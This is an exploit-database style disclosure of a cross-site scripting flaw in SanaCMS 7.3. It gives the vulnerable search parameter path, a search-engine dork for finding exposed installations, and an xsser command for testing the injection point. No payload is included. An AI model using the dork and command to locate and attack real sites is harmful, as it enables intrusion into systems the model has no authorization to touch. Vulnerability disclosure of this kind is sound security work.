#####
#Exploit Title: SANADATA | SanaCMS 7.3 Cross Site Scripting
#Exploit Author: Hosein Askari
#Vendor HomePage: https://www.sanadata.com/|
#Version : 7.3
#Dork : intext:"SANADATA | SanaCMS 7.3"
#Tested on:Parrot OS
#Date: 3-2-2017
#Category: webapps
#Vulnerability Path : http://127.0.0.1/fa/index.asp?p=search&search=
#Command For Testing:
#xsser -u "http://127.0.0.1/en/index.asp?p=search&search="
# Author Mail :hosein.askari@aol.com
#####